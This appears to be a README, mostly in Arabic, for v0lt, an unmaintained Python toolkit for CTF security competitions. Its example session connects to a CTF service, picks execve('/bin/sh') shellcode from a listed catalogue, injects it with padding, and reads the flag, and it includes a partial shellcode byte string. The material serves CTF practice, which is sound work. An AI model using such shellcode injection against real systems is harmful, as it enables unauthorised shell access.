
مجموعة أدوات CTF الأمنية (لم تعد مدعومة)

v0lt هي محاولة لتجميع كل أداة استخدمتها/أستخدمها/سأستخدمها في مسابقات CTF الأمنية، بأسلوب Python. تم حل الكثير من التمارين باستخدام نصوص bash ولكن Python قد تكون أكثر مرونة، هذا هو السبب. لا علاقة لها بـ Gallopsled. إنها مجموعة أدوات صغيرة، تحتوي على أدوات مساعدة صغيرة ومحددة فقط.
لم يعد هذا المشروع مُدارًا، لأن الأدوات المساعدة نفسها صغيرة بما يكفي لتعمل دائمًا تقريبًا دون الحاجة إلى صيانة أي شيء. لا تتردد في تقديم Pull Requests إذا أردت :)
# for v0lt install
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install # sudo is required for potentially missing dependencies
>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected to port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellCrafter(4096, "bin","execve")
>>> shellhack.get_shellcodes(shellhack.keywords)
...<SNIPPED>...
85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
86: Linux/x86:execve (/bin/sh) - 21 Bytes
87: Linux/x86:break chroot execve /bin/sh - 80 bytes
88: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
...<SNIPPED>...
Selection: 86
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"
>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
File name too long
P1kaCTF{sh3llc0de_1s_e4zY}
التشفير
أكواد الشل
دعم الاتصال السهل
الحل
والمزيد
الأمثلة متاحة